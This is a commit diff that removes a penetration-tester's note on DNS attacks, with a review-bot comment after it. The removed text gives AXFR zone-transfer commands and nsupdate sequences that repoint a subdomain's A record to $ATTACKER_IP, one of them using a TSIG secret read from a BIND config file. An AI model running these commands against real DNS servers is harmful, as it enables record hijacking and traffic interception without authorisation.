clean up and rewrite
parent 0f1b59e80f
commit 3f066cb663
@ -1,43 +0,0 @@
# DNS
## Subdomain Enumeration
* Get all the info via
```sh
dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
```
There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration.
A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
## Join a Domain
Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
### Found Secrets for Keys
Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain.
```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
namefromtext
keycreate
server <domain>
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP
send
```
*Hint:* Copy the lines, every space counts as it has to be exactly like in the example
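Review bot: the hunk header `@ -1,43 +0,0 @@` removes all 43 lines of the DNS note and nothing visible here replaces them, so the "rewrite" half of the commit message cannot be checked from this hunk; point to or include the file that takes over the `axfr` and `nsupdate` material. If the text is carried over, fix what is unclear in the removed version: under "Join a Domain" the sentence says the update "needs cert and Pk" while the `nsupdate` block that follows uses no key at all, and the sentence under "Found Secrets for Keys" ("Sometimes secrets can be found secret like a key") does not parse. The `nsupdate -d -y <hash algorithm>:<name of the key>:<secret>` line also puts the secret on the command line, where it lands in shell history and the process list; the rewrite should say so and mention the `-k` key file option as the alternative.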